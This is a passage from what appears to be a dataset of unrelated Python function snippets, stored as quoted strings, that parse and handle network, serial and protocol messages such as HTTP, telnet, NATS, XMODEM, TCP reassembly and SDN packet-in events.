\\\n self.type == 
httpParserTypes.REQUEST_PARSER and \\\n self.method == httpMethods.POST and \\\n (b'content-length' not in self.headers or\n (b'content-length' in self.headers and\n int(self.headers[b'content-length'][1]) == 0)) and \\\n self.bytes.endswith(CRLF * 2):\n self.state = httpParserStates.COMPLETE\n\n return len(raw) > 0, raw", "def parse(self):\n i = 1\n times = []\n while 1:\n byte = yield\n if byte== 0xaa:\n byte = yield # This byte should be \"\\aa\" too\n if byte== 0xaa:\n # packet synced by 0xaa 0xaa\n packet_length = yield\n packet_code = yield\n if packet_code == 0xd4:\n # standing by\n self.state = \"standby\"\n elif packet_code == 0xd0:\n self.state = \"connected\"\n elif packet_code == 0xd2:\n data_len = yield\n headset_id = yield\n headset_id += yield\n self.dongle_state = \"disconnected\"\n else:\n self.sending_data = True\n left = packet_length - 2\n while left>0:\n if packet_code ==0x80: # raw value\n row_length = yield\n a = yield\n b = yield\n value = struct.unpack(\"<h\",chr(b)+chr(a))[0]\n self.dispatch_data(\"raw\", value)\n left -= 2\n elif packet_code == 0x02: # Poor signal\n a = yield\n\n left -= 1\n elif packet_code == 0x04: # Attention (eSense)\n a = yield\n if a>0:\n v = struct.unpack(\"b\",chr(a))[0]\n if 0 < v <= 100:\n self.dispatch_data(\"attention\", v)\n left-=1\n elif packet_code == 0x05: # Meditation (eSense)\n a = yield\n if a>0:\n v = struct.unpack(\"b\",chr(a))[0]\n if 0 < v <= 100:\n self.dispatch_data(\"meditation\", v)\n left-=1\n elif packet_code == 0x16: # Blink Strength\n self.current_blink_strength = yield\n \n left-=1\n elif packet_code == 0x83:\n vlength = yield\n self.current_vector = []\n for row in range(8):\n a = yield\n b = yield\n c = yield\n value = a*255*255+b*255+c\n left -= vlength\n self.dispatch_data(\"bands\", self.current_vector)\n packet_code = yield\n else:\n pass # sync failed\n else:\n pass # sync failed", "def after_process(self, packet, ret_packet):\n pass", "def is_complete(self, code):\n try:\n res = self.jiloop.parse().apply(code)\n output_class = res.getClass().getName()\n _, status = output_class.rsplit(\"$\", 1)\n if status == 'Success':\n return 'complete'\n elif status == 'Incomplete':\n return 'incomplete'\n else:\n return 'invalid'\n\n finally:\n self.jbyteout.reset()", "def state_cmd(self, byte):\n if byte in telnet_cmds:\n self.telnet_cmd.append(byte)\n if 251 <= byte <= 254:\n self.next_fn = self.state_option\n elif byte == 250:\n self.next_fn = self.state_sub\n else:\n self.handle_telnet_cmd(self.telnet_cmd)\n self.next_fn = self.state_text\n else:\n # unknown/invalid command\n self.next_fn = self.state_text", "def on_pes_packet_complete(self):\n pass", "def receive_packet(self, packet):\n\t\treturn", "def receive(self, packet):\n packet_key = (packet.src, packet.dest)\n # receiving wan\n if packet.dest in self.address_to_port:\n # The packet is destined to one of the clients connected to this middlebox;\n # send the packet there.\n\n if not packet.is_raw_data:\n block = self.hash_payloads[packet.payload]\n self.send_block(block, packet_key, packet.is_fin, False)\n else:\n self.add_packet_to_buffer(packet_key, packet)\n curr_block = self.buffers[packet_key]\n block_length = len(curr_block)\n left = 0\n right = 48 if block_length >= 48 else block_length\n while right <= block_length:\n block = curr_block[left:right]\n block_hash = utils.get_hash(block)\n is_delimiter = utils.get_last_n_bits(block_hash, 13) == self.GLOBAL_MATCH_BITSTRING\n if is_delimiter:\n send_block = curr_block[:right]\n curr_block = 
curr_block[right:]\n self.buffers[packet_key] = curr_block\n self.determine_if_hashed(send_block, packet_key, packet.is_fin, False)\n left = right\n if block_length - right >= 48:\n right = right + 48\n else:\n right = block_length\n if packet.is_fin:\n send_block = curr_block[left: block_length]\n self.determine_if_hashed(send_block, packet_key, True, False)\n self.buffers.pop(packet_key, None)\n break\n else:\n left = left + 1\n right = right + 1\n if packet_key in self.buffers:\n if packet.is_fin:\n send_block = self.buffers[packet_key]\n self.determine_if_hashed(send_block, packet_key, True, False)\n self.buffers.pop(packet_key, None)\n else:\n self.buffers.pop(packet_key, None)\n # sending wan\n else:\n # The packet must be destined to a host connected to the other middlebox\n # so send it across the WAN.\n\n self.add_packet_to_buffer(packet_key, packet)\n curr_block = self.buffers[packet_key]\n block_length = len(curr_block)\n left = 0\n right = 48 if block_length >= 48 else block_length\n while right <= block_length:\n block = curr_block[left:right]\n block_hash = utils.get_hash(block)\n is_delimiter = utils.get_last_n_bits(block_hash, 13) == self.GLOBAL_MATCH_BITSTRING\n if is_delimiter:\n send_block = curr_block[:right]\n curr_block = curr_block[right:]\n self.buffers[packet_key] = curr_block\n self.determine_if_hashed(send_block, packet_key, packet.is_fin, True)\n left = right\n if block_length - right >= 48:\n right = right + 48\n else:\n right = block_length\n if packet.is_fin:\n send_block = curr_block[left: block_length]\n self.determine_if_hashed(send_block, packet_key, True, True)\n self.buffers.pop(packet_key, None)\n break\n else:\n left = left + 1\n right = right + 1\n if packet_key in self.buffers:\n if packet.is_fin:\n send_block = self.buffers[packet_key]\n self.determine_if_hashed(send_block, packet_key, True, True)\n self.buffers.pop(packet_key, None)\n else:\n self.buffers.pop(packet_key, None)", "def state_COMMAND(self, command):\n\t\tif command.strip() == '':\n\t\t\tself.consecutiveErrors = self.consecutiveErrors + 1;\n\t\t\tif self.consecutiveErrors == 10:\n\t\t\t\tself.sendCode(221, 'Too Many Consectutive Protocol Errors (Your talking shit, Go Away)')\n\t\t\t\tself.do_QUIT()\n\t\t\treturn False;\n\t\tself.consecutiveErrors = 0\n\t\tsplits = command.split(None)\n\t\tmethod = getattr(self, 'do_' + splits[0].upper(), None)\n\t\tif method is not None:\n\t\t\tmethod(splits[1:])\n\t\telse:\n\t\t\tself.sendCode(500, 'Command Not Implemented')", "def decode_packet(data):\n\n opcodes = [(\"AUTH_LOGON_CHALLENGE\", \"\\x00\"), (\"AUTH_LOGON_PROOF\", \"\\x01\")]\n opcode = data[0] # Opcode of the received packet (First byte)\n if opcode == opcodes[0][1]: # Auth Logon challenge\n srp_rcvd = {\n 'error': data[1], # (you should hope that it is always 0)\n 'B': data[3:35], # Read B and skip 1 field (Length_g)\n 'g': data[36:37], # Read g and skip 1 field (Length_n)\n 'N': data[38:70],\n 's': data[70:102], # Read salt\n 'crc': data[102:] # (useless for private servers)\n }\n return srp_rcvd\n if opcode == opcodes[1][1]:\n # Auth logon proof\n if data[1] == \"\\x00\": # Code error: 0\n srp_rcvd = {'login': 1}\n else:\n srp_rcvd = {'login': 0}\n return srp_rcvd", "def next_byte(data_socket):\r\n return data_socket.recv(1)", "def next_byte(data_socket):\r\n return data_socket.recv(1)", "def done_parsing(self):\n # STUDENT\n return (self.input_buffer_len() == 1 ) and (self.stack_len()==1) \n # END STUDENT", "def parse(self, data=''):\n self.scratch += data\n for i in 
self.scratch:\n if self.state == AWAITING_CONTROL_LINE:\n\n # MSG\n if self.scratch.startswith(MSG_OP):\n self.state = AWAITING_MSG_ARG\n\n # OK\n elif self.scratch.startswith(OK):\n # No op. But still consume OK from buffer and set next state.\n if len(self.scratch) > OK_SIZE:\n self.scratch = self.scratch[OK_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n # -ERR\n elif self.scratch.startswith(ERR_OP):\n self.state = AWAITING_MINUS_ERR_ARG\n\n # PONG\n elif self.scratch.startswith(PONG):\n self.nc._process_pong()\n\n if len(self.scratch) > PONG_SIZE:\n self.scratch = self.scratch[PONG_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n # PING\n elif self.scratch.startswith(PING):\n self.nc.send_command(PONG)\n if len(self.scratch) > PING_SIZE:\n self.scratch = self.scratch[PING_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n elif self.state == AWAITING_MSG_ARG:\n i = self.scratch.find(_CRLF_)\n if i > 0:\n line = self.scratch[:i]\n args = line.split(_SPC_)\n\n # Check in case of using a queue\n args_size = len(args)\n if args_size == 5:\n self.msg_arg[\"subject\"] = args[1]\n self.msg_arg[\"sid\"] = int(args[2])\n self.msg_arg[\"reply\"] = args[3]\n self.needed = int(args[4])\n elif args_size == 4:\n self.msg_arg[\"subject\"] = args[1]\n self.msg_arg[\"sid\"] = int(args[2])\n self.msg_arg[\"reply\"] = \"\"\n self.needed = int(args[3])\n else:\n raise ErrProtocol(\"Wrong number of arguments in MSG\")\n self.scratch = self.scratch[i+CRLF_SIZE:]\n self.state = AWAITING_MSG_PAYLOAD\n\n elif self.state == AWAITING_MSG_PAYLOAD:\n if len(self.scratch) >= self.needed:\n payload = self.scratch[:self.needed]\n subject = self.msg_arg[\"subject\"]\n sid = self.msg_arg[\"sid\"]\n reply = self.msg_arg[\"reply\"]\n\n # Set next stage already before dispatching to callback\n self.scratch = self.scratch[self.needed:]\n self.state = AWAITING_MSG_END\n\n msg = Msg(subject=subject, sid=sid, reply=reply, data=payload)\n self.nc._process_msg(msg)\n\n elif self.state == AWAITING_MSG_END:\n i = self.scratch.find(MSG_END)\n if i > 0:\n self.scratch = self.scratch[i+1:]\n self.state = AWAITING_CONTROL_LINE\n\n # -ERR 'error'\n elif self.state == AWAITING_MINUS_ERR_ARG:\n i = self.scratch.find(_CRLF_)\n if i > 0:\n line = self.scratch[:i]\n _, err = line.split(_SPC_, 1)\n self.nc._process_err(err)\n if len(self.scratch) > i+CRLF_SIZE:\n self.scratch = self.scratch[i+CRLF_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE", "def validate(msg):\n valid = True\n\n if not msg or len(msg) < 4:\n return False, -1, -1\n\n checksum = msg[-1]\n length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n # try:\n # # here works for pyton 3 only\n # length = int.from_bytes(msg[1:3], byteorder='big', signed=False)\n # except Exception:\n # length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n\n validlen = len(msg[3:-1])\n validsum = 0xFF - ((sum(msg[3:-1])) & 0xFF)\n\n # print('length: ' + str(self.length) + '; ' + str(validlen))\n # print('checksum: ' + str(self.checksum) + '; ' + str(validsum))\n\n # check sanity of computed Length and Checksum with the one in the message\n if (checksum != validsum) or (length != validlen):\n valid = False\n\n return valid, length, checksum", "def isOK(ser):\n while 1:\n msg=ser.readline(300)\n if msg.find(\"<\")!=-1:\n break\n if msg.find(\"<OK\")!=-1:\n return True\n return False", "def _handle_ok_ack(string):\n if string.strip() == Parser.OK_MSG:\n return 
True\n return False", "def handle_packet(self, packet):\n if self.compression:\n compression_len, packet = ParseVarInt(packet, consume=True)\n\n # if we have compressed data decompress it\n if compression_len != 0:\n packet = zlib.decompress(bytearray(packet))\n\n packet_id, packet = ParseVarInt(packet, consume=True)\n try:\n packet_id = str(self.state(packet_id))\n except ValueError:\n # print(\"Unknown packet ID %s for state %s\" % (hex(packet_id), self.state))\n pass\n\n try:\n func = getattr(self, \"handle_\" + packet_id.split(\".\")[1])\n packet = func(packet=packet)\n assert len(packet) == 0\n except AttributeError:\n # print(\"Unknown packet: %s\" % packet)\n pass", "def read_byte():\n try:\n result = ord(self._buffer[read_cursor[0]])\n read_cursor[0] += 1\n return result\n except IndexError:\n raise ASN1WantMore('Premature end of input.')", "def _parse_message(self, data):\n try:\n _, values = data.split(':')\n self.serial_number, self.value = values.split(',')\n self.value = int(self.value, 16)\n\n is_bit_set = lambda b: self.value & (1 << (b - 1)) > 0\n\n # Bit 1 = unknown\n self.battery = is_bit_set(2)\n self.supervision = is_bit_set(3)\n # Bit 4 = unknown\n self.loop[2] = is_bit_set(5)\n self.loop[1] = is_bit_set(6)\n self.loop[3] = is_bit_set(7)\n self.loop[0] = is_bit_set(8)\n\n except ValueError:\n raise InvalidMessageError('Received invalid message: {0}'.format(data))", "def rcvByte(self):\r\n\t\t# verifico se c'e' qualcosa in ricezione\r\n\t\tcou = self.ser.inWaiting()\r\n\t\tif cou > 0:\r\n\t\t\t# prelievo un byte\r\n\t\t\treturn self.ser.read(cou)\r\n\t\telse:\r\n\t\t\treturn None", "def receive_state(self):\n # Wait for useful data\n received_char = self._sock.recv(1)\n while(received_char == b'\\x00'):\n received_char = self._sock.recv(1)\n\n # Decode received data\n length_str = received_char + self._sock.recv(1)\n total = int.from_bytes(length_str, \"big\")\n state = self._sock.recv(total).decode(\"UTF-8\")\n\n state = json.loads(state)\n\n return self.convert_board(state[\"board\"]), state[\"turn\"].lower()", "def Read_Response(self, expected = bytes([0x01])):\r\n data = self.Port.read(1)\r\n if data == expected: return True\r\n return False", "def code(self):\n return struct.unpack('<B', self.pkt.payload[0:1])[0]", "def verify(self, h):\n CrawlConfig.log(\"hsi(%d) attempting to verify %s\" % (h.pid(),\n self.path))\n rsp = h.hashverify(self.path)\n\n if \"TIMEOUT\" in rsp or \"ERROR\" in rsp:\n rval = \"skipped\"\n self.set('fails', self.fails + 1)\n CrawlConfig.log(\"hashverify transfer incomplete on %s -- skipping\"\n % self.path)\n h.quit()\n elif \"%s: (md5) OK\" % self.path in rsp:\n rval = \"matched\"\n CrawlConfig.log(\"hashverify matched on %s\" % self.path)\n elif \"no valid checksum found\" in rsp:\n if self.addable(self.cos):\n rval = self.add_to_sample(h)\n else:\n self.set('checksum', 0)\n rval = \"skipped\"\n CrawlConfig.log(\"hashverify skipped %s\" % self.path)\n else:\n rval = Alert.Alert(\"Checksum mismatch: %s\" % rsp)\n CrawlConfig.log(\"hashverify generated 'Checksum mismatch' \" +\n \"alert on %s\" % self.path)\n return rval", "def _get_checksum(self, arg):", "def parse(self, data):\r\n\r\n parser.Parser.parse(self, data)\r\n\r\n # in case the current state of the parser is finished, must\r\n # reset the state to the start position as the parser is\r\n # re-starting (probably a new data sequence)\r\n if self.state == FINISH_STATE: self.clear()\r\n\r\n # retrieves the size of the data that has been sent for parsing\r\n # and saves it under the 
size original variable\r\n size = len(data)\r\n size_o = size\r\n\r\n # iterates continuously to try to process all that\r\n # data that has been sent for processing\r\n while size > 0:\r\n\r\n if self.state <= self.state_l:\r\n method = self.states[self.state - 1]\r\n count = method(data)\r\n if count == -1: break\r\n if count == 0: continue\r\n\r\n size -= count\r\n data = data[count:]\r\n\r\n continue\r\n\r\n elif self.state == FINISH_STATE:\r\n self.clear()\r\n\r\n continue\r\n\r\n else:\r\n raise netius.ParserError(\"Invalid state '%d'\" % self.state)\r\n\r\n # in case not all of the data has been processed\r\n # must add it to the buffer so that it may be used\r\n # latter in the next parsing of the message\r\n if size > 0: self.buffer.append(data)\r\n\r\n # returns the number of read (processed) bytes of the\r\n # data that has been sent to the parser\r\n return size_o - size", "def handle_packet(self, srcif, packet) -> bool:\n typeOfPacket = packet[\"type\"]\n if typeOfPacket == DATA:\n return self.forward(srcif, packet)\n elif typeOfPacket == DUMP:\n return self.dump(packet)\n elif typeOfPacket == UPDT:\n return self.update(srcif, packet)\n elif typeOfPacket == RVKE:\n return self.revoke(packet)\n else:\n return False", "def _check_md5sum(_setup_str, src_host, src_pfn):\n\n error = PilotErrors()\n\n _cmd = '%suberftp %s \"quote cksm md5sum 0 -1 %s\"' % (_setup_str, src_host, src_pfn)\n estat, coutp = commands.getstatusoutput(_cmd)\n tolog('md5 uberftp done <%s> (%s): %s' % (_cmd, estat, coutp))\n\n if estat != 0:\n check_syserr(estat, coutp)\n if coutp.find('not understood') >= 0:\n tolog('!!WARNING!!2999!! MD5 unsupported by the server')\n return error.ERR_FAILEDMD5, coutp\n try:\n tmp0 = coutp.split('\\n')[-1]\n fmd5usm = tmp0.split()[1]\n # split removes also the trailing \"\\r\" that uberftp returns, no fmd5sum.strip()\n except:\n tolog('!!WARNING!!2999!! Unable to parse MD5')\n fmd5usm = ''\n return 0, fmd5usm", "def song_just_finished(self):\n uart_return_code = self.mp3Player.uart.readline()\n _debug(\"uart_return_code\", uart_return_code)\n # uart_return_code == b'~\\xff\\x06=\\x00\\x00\\x12\\xfe\\xac\\xef~\\xff\\x06=\\x00\\x00\\x12\\xfe\\xac\\xef'\n return uart_return_code and b'\\x06=' in uart_return_code", "def read(self, msg, ans_len):\n self.write(msg)\n # Length is sum of header(2), length, check, cmd, ans_len and end\n length = 6 + ans_len\n ans = self.sock.recv(length)\n if self.__check(ans):\n return ans[4:-2]\n return None", "def _check_packet(self, packet):\n src, dst = self._parse_packet_src_dst(packet)\n tcp = get_ip_packet(packet.load).data\n if tcp.flags & dpkt.tcp.TH_RST:\n if (src, dst) in self._last_tcp_seq:\n del self._last_tcp_seq[(src, dst)]\n else:\n if not tcp.data: raise BadPacket(\"no payload\")\n if (src, dst) in self._last_tcp_seq:\n last_seq = self._last_tcp_seq[(src, dst)]\n if tcp.seq <= last_seq:\n # this exception eliminates dups\n raise BadPacket(\"This sequence(%d<=%d) seen before\" % (tcp.seq, last_seq))\n self._last_tcp_seq[(src, dst)] = tcp.seq", "def _await_operation_result(self):\n response = ReadMessage(self.connection.receive_message())\n result = response.read_uint8()\n self._assert_success(result)", "def parse(data: bytes, port: int, origin: helpers.ConnectionType):\n # Ignore packets from master server... 
game server is more interesting\n if port == helpers.MASTER_PORT:\n return\n # Iteratively parse packet data until nothing is left to parse\n reads = 0\n while len(data) >= 2:\n reads += 1\n pid = data[:2]\n handler = PACKET_HANDLERS.get(pid, None)\n if handler:\n # Parse data without packet id prepended\n # Returned data will be parsed next iteration\n data = handler(data[2:], origin=origin)\n else:\n # This packet doesn't have a handler\n # Print it once for inspection\n if reads <= 1:\n print(f'[{pid}] - {data}\\n')\n # Remove the first byte and try parsing again later\n data = data[1:]", "def packetCheck(packet):\n info = [packet[i : i + 2] for i in range(0, len(packet), 2)]\n MagicNo = int.from_bytes(info[0], \"big\")\n PacketType = int.from_bytes(info[1], \"big\")\n RequestType = int.from_bytes(info[2], \"big\")\n if MagicNo != 0x497E:\n return False\n if PacketType != 0x0001:\n return False\n if RequestType != 0x0001 and RequestType != 0x0002:\n return False\n return True", "def reassemble(self) -> Optional[Dict[str, Any]]:\n # This is really crude, just make sure that we get a SYN -> SYN/AC -> ACK, then a FIN -> FIN/ACK -> ACK\n state: Dict[str, Dict[str, Optional[str]]] = {\n TCPStream.INBOUND: {\n 'syn': None,\n 'fin': None,\n },\n TCPStream.OUTBOUND: {\n 'syn': None,\n 'fin': None,\n }\n }\n sequence = {\n TCPStream.INBOUND: 0,\n TCPStream.OUTBOUND: 0,\n }\n\n def other_direction(direction: str) -> str:\n if direction == TCPStream.INBOUND:\n return TCPStream.OUTBOUND\n else:\n return TCPStream.INBOUND\n\n # Crude state machine to ensure that every SYN was ack'd and every FIN was ack'd. Should probably\n # also check that SYNs are ack'd before FINs but whatever, it works well enough for now.\n for packet in self.packets:\n direction = packet[0]\n other = other_direction(direction)\n syn = packet[1]['tcp_header']['flags']['syn']\n fin = packet[1]['tcp_header']['flags']['fin']\n ack = packet[1]['tcp_header']['flags']['ack']\n seq = packet[1]['tcp_header']['sequence']\n\n if syn:\n if state[direction]['syn'] is None:\n state[direction]['syn'] = 'sent'\n sequence[direction] = seq\n if fin:\n if state[direction]['fin'] is None:\n state[direction]['fin'] = 'sent'\n if ack:\n if state[other]['syn'] == 'sent':\n state[other]['syn'] = 'ackd'\n if state[other]['fin'] == 'sent':\n state[other]['fin'] = 'ackd'\n\n if (\n state[TCPStream.INBOUND]['syn'] == 'ackd' and\n state[TCPStream.INBOUND]['fin'] == 'ackd' and\n state[TCPStream.OUTBOUND]['syn'] == 'ackd' and\n state[TCPStream.OUTBOUND]['fin'] == 'ackd'\n ):\n # This stream is finished, can be reassembled\n data = {\n TCPStream.INBOUND: b'',\n TCPStream.OUTBOUND: b'',\n }\n\n def add_data(packet: bytes, data: bytes, offset: int) -> bytes:\n length = len(data)\n\n if len(packet) < offset:\n # Pad out, then add\n packet = packet + b'\\0' * (offset - len(packet))\n return packet + data\n if len(packet) == offset:\n # Add to end\n return packet + data\n if len(packet) > offset and len(packet) <= (offset + length):\n # Truncate, then add\n packet = packet[:offset]\n return packet + data\n if len(packet) > (offset + length):\n before = packet[:offset]\n after = packet[offset + length:]\n return before + data + after\n\n raise Exception('Logic error!')\n\n for packet in self.packets:\n dir = packet[0]\n syn = packet[1]['tcp_header']['flags']['syn']\n fin = packet[1]['tcp_header']['flags']['fin']\n ack = packet[1]['tcp_header']['flags']['ack']\n seq = packet[1]['tcp_header']['sequence']\n\n if syn:\n continue\n\n # Figure out what this packet 
has\n length = len(packet[1]['data'])\n position = seq - sequence[dir] - 1\n\n if length > 0:\n data[dir] = add_data(data[dir], packet[1]['data'], position)\n\n return {\n 'source_address': self.source_address,\n 'destination_address': self.destination_address,\n 'source_port': self.source_port,\n 'destination_port': self.destination_port,\n TCPStream.INBOUND: data[TCPStream.INBOUND],\n TCPStream.OUTBOUND: data[TCPStream.OUTBOUND],\n }\n\n return None", "def test_xmodem1k_recv_bad_checksum():\n # Given,\n _, send_filename = tempfile.mkstemp()\n try:\n with open(send_filename, 'wb') as stream:\n fill_binary_data(stream)\n proc = subprocess.Popen(\n (send_prog, '--xmodem', '--verbose', send_filename),\n stdin=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=0)\n\n getc = functools.partial(_proc_getc_fail_16bit_checksum, proc=proc)\n putc = functools.partial(_proc_putc, proc=proc)\n\n xmodem = XMODEM1k(getc, putc)\n recv_stream = BytesIO()\n\n # Exercise,\n status = xmodem.recv(recv_stream, timeout=5, crc_mode=1)\n\n # Verify,\n assert status == recv_stream.tell()\n verify_binary_data(recv_stream, padding=b'\\x1a')\n proc.wait()\n assert proc.returncode == 0\n\n finally:\n os.unlink(send_filename)", "def check_success(out):\n\n successful_re = re.compile(r'(?<!\")completed OK!', re.I | re.M)\n try:\n succ = successful_re.search(out.decode('ascii'))\n except TypeError as e:\n succ = successful_re.search('\\n'.join(out))\n issucc = True if succ else False\n return issucc", "def main():\n\n ruleset, meta = parse_input(get_input())\n start, steps = meta\n x = run(ruleset, start, steps)\n print(\"Checksum is {}.\".format(x))\n\n return", "def parse_next_instruction(self) -> None:\n instruction = self.program[self.pointer]\n opcode = instruction % 100\n if opcode == 99:\n self.halt = True\n\n self.modes = instruction // 100\n\n if opcode == 1:\n self.op_sum()\n if opcode == 2:\n self.op_multiply()\n if opcode == 3:\n self.op_input()\n if opcode == 4:\n self.op_output()\n if opcode == 5:\n self.op_jump_if_true()\n if opcode == 6:\n self.op_jump_if_false()\n if opcode == 7:\n self.op_less_than()\n if opcode == 8:\n self.op_equal_to()\n if opcode == 9:\n self.op_adjust_relative()", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP 
response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. 
Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. 
Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' 